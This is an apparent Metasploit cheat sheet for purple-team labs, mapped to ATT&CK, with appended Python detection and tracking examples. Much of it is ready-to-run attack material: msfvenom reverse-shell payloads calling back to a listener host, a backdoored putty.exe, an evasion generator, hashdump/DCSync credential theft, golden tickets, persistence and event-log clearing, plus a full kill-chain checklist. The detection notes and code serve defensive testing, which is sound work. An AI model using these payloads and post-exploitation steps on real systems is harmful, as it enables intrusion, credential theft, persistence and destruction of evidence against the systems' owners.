// Metasploit Framework Cheat Sheet
msfconsole, msfvenom payload generation, and Meterpreter post-exploitation reference for adversary simulation, purple team exercises, and detection engineering. Commands mapped to MITRE ATT&CK where applicable.
Metasploit 6.x
msfvenom / Meterpreter
MITRE ATT&CK Mapped
msfconsole Basics
Launching & Global Commands
| Command | Description |
|---|---|
| msfconsole | Start the framework |
| msfconsole -q | Start quietly, no banner |
| msfconsole -r script.rc | Auto-run a resource script on start |
| help | List all commands |
| help <cmd> | Help for a specific command |
| banner | Random banner (harmless fun) |
| version | Framework version info |
| exit / quit | Leave msfconsole |
Global Variables & History
| Command | Description |
|---|---|
| setg RHOSTS 10.10.10.5 | Set a global var (persists across modules) |
| unsetg RHOSTS | Unset a global var |
| save | Save current datastore/config |
| history | Show console command history |
| makerc out.rc | Dump session history to resource script |
| irb | Drop to Ruby interactive shell |
| load <plugin> | Load a plugin (e.g. nessus, sqlmap) |
Use setg for RHOSTS/LHOST/LPORT once per engagement to avoid re-typing them for every module.
Jobs, Threads & Logging
| Command | Description |
|---|---|
| jobs | List background jobs |
| jobs -k <id> | Kill a job |
| jobs -K | Kill all jobs |
| spool /tmp/msf.log | Log console output to file |
| route add <net> <mask> <sid> | Route traffic through a session |
| sessions -l | List active sessions |
| sessions -i <id> | Interact with a session |
Workspace & Database
Database & Workspace Management
Database Setup
| Command | Description |
|---|---|
| db_status | Check DB connectivity |
| db_connect msf:<password>@<host>/msf | Manual DB connect (user:password@host/dbname; placeholders, the page's original value was garbled) |
| db_nmap -sV -A 10.10.10.0/24 | Nmap scan, results stored in DB |
| db_import scan.xml | Import Nmap/Nessus/Nexpose results |
| db_export -f xml report.xml | Export workspace data |
Workspaces
| Command | Description |
|---|---|
| workspace | List workspaces |
| workspace -a silent_ledger | Add and switch workspace |
| workspace silent_ledger | Switch active workspace |
| workspace -d old_op | Delete a workspace |
Querying Stored Data
Hosts, Services, Vulns, Creds
| Command | Description |
|---|---|
| hosts | List discovered hosts |
| hosts -R | Set RHOSTS from all hosts in workspace |
| services -p 445 | Filter services by port |
| vulns | List discovered vulnerabilities |
| creds | List captured credentials |
| creds add user:admin pass:P@ss123 | Manually add a credential |
| loot | List collected loot (dumps, files) |
| notes | List analyst notes on hosts |
Module Search & Selection
Searching for Modules
search Syntax
| Command | Description |
|---|---|
| search eternalblue | Keyword search |
| search type:exploit platform:windows smb | Filtered search |
| search cve:2021-34527 | Search by CVE |
| search rank:excellent name:apache | Filter by reliability rank |
| search date:2024 windows local | Recent local privesc modules |
Module Types
exploit/, auxiliary/, post/, payload/, encoder/, nop/, evasion/
Selecting & Inspecting Modules
Load a Module
| Command | Description |
|---|---|
| use exploit/windows/smb/ms17_010_eternalblue | Load by full path |
| use 3 | Load by search result index |
| back | Unload current module |
Inspect Before Running
| Command | Description |
|---|---|
| info | Full module details, references, targets |
| show options | Required/optional datastore options |
| show targets | Valid exploit targets |
| show payloads | Compatible payloads for module |
| show advanced | Advanced tuning options |
| check | Test vulnerability without exploiting (safe) |
Setting Options & Running
Configuring & Executing
Core Options
| Command | Description |
|---|---|
| set RHOSTS 10.10.10.5 | Target host(s) |
| set RPORT 445 | Target port |
| set PAYLOAD windows/x64/meterpreter/reverse_tcp | Attach a payload |
| set LHOST 10.10.10.200 | Listener/callback address |
| set LPORT 4444 | Listener port |
| set TARGET 0 | Explicit exploit target index |
Run
| Command | Description |
|---|---|
| exploit | Run exploit (foreground) |
| exploit -j -z | Run as background job, don't interact |
| run | Alias for exploit (also used for auxiliary/post) |
Session Management
Working With Sessions
| Command | Description |
|---|---|
| sessions | List all sessions |
| sessions -i 1 | Interact with session 1 |
| sessions -u 1 | Upgrade shell to Meterpreter |
| sessions -k 1 | Kill session 1 |
| sessions -K | Kill all sessions |
| sessions -C "sysinfo" -i 1 | Run one command on a session |
| background | (Inside session) return to msfconsole, keep alive |
Prefer exploit -j -z for engagements with multiple simultaneous targets so sessions stack up in the background.
msfvenom Syntax
Core Syntax & Flags T1027 T1204
| Flag | Description | Example |
|---|---|---|
| -p | Payload path | windows/x64/meterpreter/reverse_tcp |
| -a | Target architecture | x86 / x64 |
| --platform | Target platform | windows / linux / osx / android |
| -f | Output format | exe / elf / raw / psh / apk |
| -e | Encoder | x86/shikata_ga_nai |
| -i | Encode iterations | 3 |
| -b | Bad chars to avoid | '\x00\x0a\x0d' |
| -x | Template executable | putty.exe (for injection) |
| -k | Keep template functionality | run alongside payload |
| -o | Output file | shell.exe |
| -n | NOP sled length (bytes) | 16 |
| --smallest | Minimize payload size | |
Discovery Commands
msfvenom -l payloads # List all payloads
msfvenom -l encoders # List all encoders
msfvenom -l formats # List all output formats
msfvenom -l nops # List NOP generators
msfvenom -p windows/meterpreter/reverse_tcp --list-options # Payload-specific options
Staged payloads (e.g. windows/meterpreter/reverse_tcp) are smaller but need a matching stager handler. Stageless payloads (windows/meterpreter_reverse_tcp) are self-contained and larger, which makes them easier for IDS/AV to flag on size alone.
Payload Generation One-Liners
Windows Payloads
EXE (staged Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f exe -o shell.exe
PowerShell (in-memory)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f psh-reflection -o shell.ps1
DLL (sideloading)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f dll -o shell.dll
HTA (phishing delivery)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f hta-psh -o shell.hta
MSI (installer-based)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f msi -o shell.msi
Linux / macOS Payloads
Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o shell.elf
Linux Shell (netcat-style)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o rshell.elf
macOS Mach-O
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f macho -o shell.macho
Bash one-liner (no binary)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.200 LPORT=4444 -f raw
Python (cross-platform)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.py
Web / Mobile Payloads
PHP Web Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.php
JSP (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.jsp
WAR (Tomcat manager deploy)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f war -o shell.war
Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -o shell.apk
ASPX (IIS deploy)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f aspx -o shell.aspx
Output Formats, Encoders & Template Injection
Encoding & Bad Character Avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b '\x00\x0a\x0d' -f exe -o shell.exe
Modern AV/EDR signature-matches shikata_ga_nai easily; treat encoding as an obfuscation layer for lab exercises, not a bypass technique against production EDR.
Common Formats (-f)
exe, elf, macho, dll, raw, c, python, psh, psh-reflection, hta-psh, war, aspx, jar, vba, msi
Template / Executable Injection T1027.002
Inject into a legitimate binary
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -x putty.exe -k -f exe -o putty_backdoored.exe
Combine with encoding + multiple iterations
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 3 -x app.exe -k -f exe -o app_bd.exe
The -k flag keeps the original binary's functionality running alongside the payload thread, which is useful for realistic phishing-lure simulation in a lab.
Listener / Handler Setup
multi/handler T1071
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false # Keep listening after first catch
exploit -j -z # Background job, don’t auto-interact
Always start the handler before executing the payload on target. Match PAYLOAD, LHOST and LPORT exactly to what was used in msfvenom.
Resource Scripts for Repeatable Handlers
handler.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false
exploit -j -z
Launch with it
msfconsole -q -r handler.rc
Useful for consistent, version-controlled handler configs across repeated Operation Silent Ledger runs.
Meterpreter — Core Commands
Situational Awareness
| Command | Description |
|---|---|
| sysinfo | OS, hostname, architecture |
| getuid | Current user context |
| getpid | Current process ID |
| ps | List running processes |
| getprivs | List enabled privileges |
| enumdesktops | List accessible desktops |
| idletime | User idle time (for opsec timing) |
| screenshot | Capture the active desktop |
| webcam_list / webcam_snap | Enumerate/capture webcam |
Session & Shell Control
| Command | Description |
|---|---|
| background | Send session to background |
| shell | Drop to native OS shell |
| exit / quit | Terminate the Meterpreter session |
| irb | Ruby shell within session context |
| info | Session metadata |
| guid | Session GUID (for reconnect) |
| channel -l | List active I/O channels |
| sleep <secs> | Put session to sleep (evade idle scans) |
Meterpreter — Filesystem & Process
Filesystem Operations T1005
Navigation
| Command | Description |
|---|---|
| pwd / getwd | Print working directory |
| cd C:\\Users\\Public | Change directory |
| ls / dir | List directory contents |
| lpwd / lcd | Local (attacker) working dir |
Transfer
| Command | Description |
|---|---|
| upload evil.exe C:\\Windows\\Temp\\ | Upload file to target |
| download C:\\Users\\admin\\creds.txt . | Download file from target |
| edit config.txt | Edit remote file with vim |
| cat notes.txt | Print file contents |
| rm evidence.log | Delete a file (anti-forensics) |
| timestomp file.txt -v | View/modify MACE timestamps T1070.006 |
Process Manipulation & Migration T1055
Process Control
| Command | Description |
|---|---|
| ps | List processes (PID/PPID/arch/user) |
| migrate <PID> | Move session into another process |
| kill <PID> | Terminate a process |
| execute -f cmd.exe -i -H | Execute + interact, hidden window |
| run post/windows/manage/migrate | Auto-migrate to a stable process |
Migrate into a long-lived, medium-integrity process (e.g. explorer.exe) early: it avoids losing the session if the spawning process (e.g. an Office macro host) closes.
Meterpreter — Network & Pivoting
Network Enumeration
| Command | Description |
|---|---|
| ipconfig / ifconfig | Interface details of compromised host |
| arp | ARP cache — nearby hosts |
| netstat | Active connections (like OS netstat) |
| route | Routing table on target |
| getproxy | Proxy configuration in use |
| run post/windows/gather/enum_ad_computers | AD host enumeration |
Pivoting & Port Forwarding T1090
Route Traffic Through a Session
| Command | Description |
|---|---|
| run autoroute -s 172.30.1.0/24 | Add pivot route via session |
| run autoroute -p | Print current routes |
| background, then route add 172.30.1.0 255.255.255.0 1 | Manual route via session ID 1 |
Port Forwarding
| Command | Description |
|---|---|
| portfwd add -l 3389 -p 3389 -r 172.30.1.10 | Local-to-remote forward (RDP) |
| portfwd list | List active forwards |
| portfwd delete -l 3389 | Remove a forward |
SOCKS Proxy
| Command | Description |
|---|---|
| use auxiliary/server/socks_proxy | Start SOCKS4a/5 proxy module |
| set SRVPORT 1080; run | Then chain via proxychains |
Privilege Escalation & Credential Access
Privilege Escalation T1068
Automated Escalation
| Command | Description |
|---|---|
| getsystem | Try all built-in SYSTEM techniques |
| getsystem -t 1 | Named pipe impersonation (technique 1) |
| run post/multi/recon/local_exploit_suggester | Suggest local privesc exploits |
| use exploit/windows/local/bypassuac | UAC bypass module |
Token Manipulation T1134
| Command | Description |
|---|---|
| load incognito | Load token impersonation extension |
| list_tokens -u | List available tokens by user |
| impersonate_token "NORTHBRIDGE\\admin" | Impersonate a captured token |
| rev2self | Revert to original token |
Credential Access T1003
Hashdump & Mimikatz/Kiwi
| Command | Description |
|---|---|
| hashdump | Dump local SAM hashes |
| load kiwi | Load mimikatz-based extension |
| creds_all | Dump all available credential types |
| lsa_dump_sam | SAM database via LSA |
| lsa_dump_secrets | LSA secrets (service account creds) |
| dcsync_ntlm NORTHBRIDGE\\krbtgt | DCSync a specific account T1003.006 |
Golden/Silver Ticket T1558.001
| Command | Description |
|---|---|
| golden_ticket_create -u admin -d northbridge.local -k <krbtgt-hash> -s <SID> -t ticket.tck | Forge a Golden Ticket |
| kerberos_ticket_use ticket.tck | Load ticket into session |
| kerberos_ticket_list | List cached tickets |
Persistence
Persistence Mechanisms T1547 T1053.005
Post Modules
| Command | Description |
|---|---|
| run post/windows/manage/persistence_exe | Install EXE persistence (registry run key/service) |
| run persistence -X -i 30 -p 4444 -r 10.10.10.200 | Legacy persistence script (autoruns at boot) |
| use exploit/windows/local/registry_persistence | Registry-based persistence module |
Scheduled Task / Service
| Command | Description |
|---|---|
| shell -c "schtasks /create /tn upd /tr C:\\…\\shell.exe /sc onlogon" | Scheduled task persistence |
| run post/windows/manage/persistence_service | Install as a Windows service |
Track every persistence artifact you drop (registry keys, task names, service names, file paths) so cleanup and blue-team detection validation stay accurate for the exercise report.
Cleanup / Anti-Forensics T1070
| Command | Description |
|---|---|
| clearev | Clear Windows event logs (Security/System/App) |
| run event_manager -c | Clear specific event logs |
| timestomp <file> -z "MM/DD/YYYY HH:MM:SS" | Set arbitrary timestamp |
| rm <path> | Remove dropped tooling |
In a lab, clearing logs deliberately breaks detection validation; only use these to test whether your monitoring stack (Wazuh/Sysmon/Splunk) actually alerts on Event ID 1102 (audit log cleared).
Post-Exploitation Modules
Gather / Recon Post Modules T1082
| Module | Description |
|---|---|
| post/windows/gather/checkvm | Detect virtualization (evasion check) |
| post/windows/gather/enum_logged_on_users | Currently/recently logged on users |
| post/windows/gather/enum_shares | Enumerate SMB shares |
| post/windows/gather/credentials/credential_collector | Aggregate all crackable creds |
| post/windows/gather/enum_domain | Identify the AD domain |
| post/multi/gather/env | Dump environment variables |
| post/linux/gather/enum_configs | Linux config/service enumeration |
Manage / Escalate Post Modules
| Module | Description |
|---|---|
| post/multi/manage/shell_to_meterpreter | Upgrade plain shell to Meterpreter |
| post/windows/manage/migrate | Automated stable migration |
| post/windows/manage/enable_rdp | Enable RDP on target |
| post/windows/manage/killav | Attempt to kill known AV processes |
| post/multi/recon/local_exploit_suggester | Suggest applicable local exploits |
| post/windows/gather/smart_hashdump | Hashdump across domain-cached creds |
Run post modules with run <module> from an active Meterpreter session, or with use <module> followed by set SESSION <id> from msfconsole.
Auxiliary Scanners & Recon
Service Scanners T1046
| Module | Description |
|---|---|
| auxiliary/scanner/portscan/tcp | Basic TCP port scan |
| auxiliary/scanner/smb/smb_version | Identify SMB version/OS |
| auxiliary/scanner/ssh/ssh_version | SSH banner grab |
| auxiliary/scanner/http/http_version | HTTP server fingerprint |
| auxiliary/scanner/rdp/rdp_scanner | RDP availability/version |
Auth / Spray Modules T1110
| Module / Option | Description |
|---|---|
| auxiliary/scanner/smb/smb_login | SMB credential validation |
| auxiliary/scanner/ssh/ssh_login | SSH bruteforce/validation |
| auxiliary/scanner/winrm/winrm_login | WinRM credential check |
| auxiliary/gather/kerberos_enumusers | AS-REP username enum |
| set BLANK_PASSWORDS false | Common spray tuning option |
Exploitation Aux
| Module | Description |
|---|---|
| auxiliary/admin/smb/ms17_010_command | EternalBlue command exec |
| auxiliary/scanner/smb/smb_ms17_010 | EternalBlue vuln check |
| auxiliary/dos/… | DoS modules: lab only, never live |
| auxiliary/spoof/nbns/nbns_response | NBNS spoofing (relay setup) |
Evasion & Detection-Awareness Notes
Evasion Module & Considerations T1027
Framework Evasion Module Type
| Command | Description |
|---|---|
| use evasion/windows/windows_defender_exe | Built-in Defender-evasion generator |
| set LHOST/LPORT then generate | Produces evasive binary output |
Default Meterpreter reverse_tcp is heavily signatured by every modern EDR. In purple team exercises the value is in measuring detection coverage, not defeating controls — treat evasion as a way to generate detection gaps to fix, not a production bypass goal.
Common Detection Surfaces
| Artifact | Where it shows up |
|---|---|
| Named pipe | \\.\pipe\msagent_xx — Sysmon Event 17/18 |
| Process migration | Sysmon Event 8 (CreateRemoteThread) |
| getsystem | Named pipe impersonation — Event 1/17/18 |
| hashdump | LSASS access — Sysmon Event 10, EDR alert |
| PSExec-style exec | Service creation — Event 7045/4697 |
| clearev | Event ID 1102 (log cleared) — very high fidelity |
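As an added example (not from the original cheat sheet), the table above turned into checks over constructed Sysmon/Windows event records; it also covers the Event ID 1102 test the clearev note earlier asks for. Field names follow Sysmon's schema (PipeName, SourceImage, TargetImage, GrantedAccess); every path, name and value is invented.

```python
"""Detection checks for the artifact table above. Added example, not from the
cheat sheet: SAMPLE_EVENTS are constructed to resemble Sysmon / Windows event
records exported as JSON (Sysmon field names such as PipeName, SourceImage,
TargetImage, GrantedAccess); every path, name and value is invented."""
import re

# Meterpreter's default pipe is \\.\pipe\msagent_xx; Sysmon records it as \msagent_xx.
MSAGENT_PIPE = re.compile(r"\\msagent_[0-9a-f]{2}", re.IGNORECASE)
LSASS = re.compile(r"\\lsass\.exe$", re.IGNORECASE)
# Sysmon Event 10 fires constantly for lsass.exe; credential dumpers need
# PROCESS_VM_READ (0x0010) in GrantedAccess, so only masks containing it are flagged.
PROCESS_VM_READ = 0x0010

# Constructed sample events: five match a row of the table, two are benign noise.
SAMPLE_EVENTS = [
    {"log": "Sysmon", "EventID": 17, "Image": r"C:\Users\Public\shell.exe", "PipeName": r"\msagent_6a"},
    {"log": "Sysmon", "EventID": 8, "SourceImage": r"C:\Users\Public\shell.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"log": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"log": "System", "EventID": 7045, "ServiceName": "updsvc", "ImagePath": r"C:\Windows\Temp\svc.exe"},
    {"log": "Security", "EventID": 1102, "SubjectUserName": "admin"},
    {"log": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\notepad.exe"},
    {"log": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]


def classify(event):
    """Map one event to (artifact label from the table, detail) or None."""
    log, eid = event.get("log"), event.get("EventID")
    if log == "Sysmon" and eid in (17, 18) and MSAGENT_PIPE.search(event.get("PipeName", "")):
        return ("Named pipe", f"{event['Image']} created pipe {event['PipeName']}")
    if log == "Sysmon" and eid == 8:   # noisy on its own; tune with a source-image allowlist
        return ("Process migration", f"{event['SourceImage']} -> {event['TargetImage']}")
    if log == "Sysmon" and eid == 10 and LSASS.search(event.get("TargetImage", "")):
        if int(event.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
            return ("hashdump", f"{event['SourceImage']} opened LSASS with {event['GrantedAccess']}")
    if (log, eid) in (("System", 7045), ("Security", 4697)):
        return ("PSExec-style exec", f"service {event.get('ServiceName')} -> {event.get('ImagePath')}")
    if log == "Security" and eid == 1102:
        return ("clearev", f"audit log cleared by {event.get('SubjectUserName', '?')}")
    return None


def detect(events):
    """Return every (artifact, detail) hit in log order."""
    return [hit for hit in map(classify, events) if hit]


if __name__ == "__main__":
    for artifact, detail in detect(SAMPLE_EVENTS):
        print(f"[{artifact}] {detail}")
```

Run against the constructed events it reports five hits and stays silent on the notepad launch and the csrss.exe handle to LSASS that lacks PROCESS_VM_READ.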
Console Shortcuts & Tips
msfconsole Keybindings
| Key | Action |
|---|---|
| Tab | Autocomplete module/command/option |
| Ctrl + C | Interrupt current command |
| Ctrl + Z | Background current session |
| ↑ / ↓ | Cycle command history |
| Ctrl + R | Reverse search history |
| ? | Alias for help |
Practical Tips
| Command | Description |
|---|---|
| unset all | Clear all set datastore options |
| reload_all | Reload all modules (after custom module edit) |
| edit | Open current module's source in $EDITOR |
| reload | Reload the current module after edits |
| color false | Disable ANSI color (for logging/CI) |
Engagement Workflow (Purple Team Lab)
End-to-End Kill Chain Checklist
1. Workspace & DB Setup: workspace -a silent_ledger — keep hosts/creds/loot scoped per campaign
2. Recon & Scanning: db_nmap -sV -A target-range — feeds hosts/services tables automatically
3. Payload Generation: msfvenom -p … -f exe -o payload.exe — track hash/filename for detection scoring
4. Handler + Delivery: exploit/multi/handler backgrounded, then deliver payload via chosen initial access vector
5. Stabilize Session: migrate to a stable process, getprivs, sysinfo — confirm foothold
6. Privesc & Credential Access: getsystem, load kiwi, hashdump — map each action to a TTP for scoring
7. Lateral Movement: psexec/wmiexec modules or pass-the-hash into Server Zone hosts
8. Domain Compromise: dcsync_ntlm krbtgt, golden_ticket_create — full domain persistence
9. Cross-Reference Detections: check Wazuh/Elastic/Splunk for each TTP fired — log gaps in the purple team tracker
10. Cleanup & Report: sessions -K, remove dropped tooling, document IOCs and detection coverage per ATT&CK ID
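As an added example (not from the original cheat sheet), a small Python tracker for the checklist above and the earlier persistence note: it records the artifacts each step drops, the payload hash from step 3, and which fired ATT&CK IDs produced an alert, so the step 9 gap list and the step 10 cleanup list fall out of the data. The actions, artifact paths and alert names are constructed.

```python
"""Purple-team tracker for the checklist above and the earlier persistence note.
Added example, not from the cheat sheet; the actions, artifacts and alerts below
are constructed, and the technique IDs are the ones this page already maps."""
import hashlib
from dataclasses import dataclass, field

@dataclass
class Action:
    step: int                 # checklist step number
    technique: str            # ATT&CK ID as used on this page
    command: str              # what was run (for the report)
    artifacts: list = field(default_factory=list)  # files, keys, task/service names to remove

def payload_ioc(payload_bytes, filename):
    """Step 3: filename plus SHA-256 so hash-based detection can be scored."""
    return {"file": filename, "sha256": hashlib.sha256(payload_bytes).hexdigest()}

def coverage(actions, alerts):
    """alerts maps technique -> alert names seen in the SIEM; returns status per technique."""
    report = {}
    for a in actions:
        entry = report.setdefault(a.technique, {"steps": set(), "alerts": list(alerts.get(a.technique, []))})
        entry["steps"].add(a.step)
    for entry in report.values():
        entry["detected"] = bool(entry["alerts"])
    return report

def gaps(actions, alerts):
    """Techniques fired without any alert: the rows to log in the purple-team tracker (step 9)."""
    return sorted(t for t, e in coverage(actions, alerts).items() if not e["detected"])

def cleanup_checklist(actions):
    """Every artifact dropped, latest step first, so step 10 teardown is mechanical and complete."""
    ordered = sorted(actions, key=lambda a: -a.step)
    return [(a.step, a.technique, art) for a in ordered for art in a.artifacts]

# Constructed run of the checklist (all values invented).
CONSTRUCTED_PAYLOAD = b"MZ\x90\x00 constructed placeholder bytes, not a real PE"
ACTIONS = [
    Action(3, "T1204", "msfvenom -p windows/x64/meterpreter/reverse_tcp ... -f exe -o payload.exe",
           [r"C:\Users\Public\payload.exe"]),
    Action(5, "T1055", "migrate 1234"),
    Action(5, "T1547", "run post/windows/manage/persistence_exe",
           [r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\upd", r"C:\Windows\Temp\upd.exe"]),
    Action(6, "T1003", "hashdump"),
    Action(8, "T1558.001", "golden_ticket_create ... -t ticket.tck", ["ticket.tck"]),
]
CONSTRUCTED_ALERTS = {"T1003": ["Sysmon 10 LSASS access"], "T1055": ["Sysmon 8 CreateRemoteThread"]}

if __name__ == "__main__":
    print(payload_ioc(CONSTRUCTED_PAYLOAD, "payload.exe"))
    print("gaps:", gaps(ACTIONS, CONSTRUCTED_ALERTS))
    for step, technique, artifact in cleanup_checklist(ACTIONS):
        print(f"step {step} {technique}: remove {artifact}")
```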

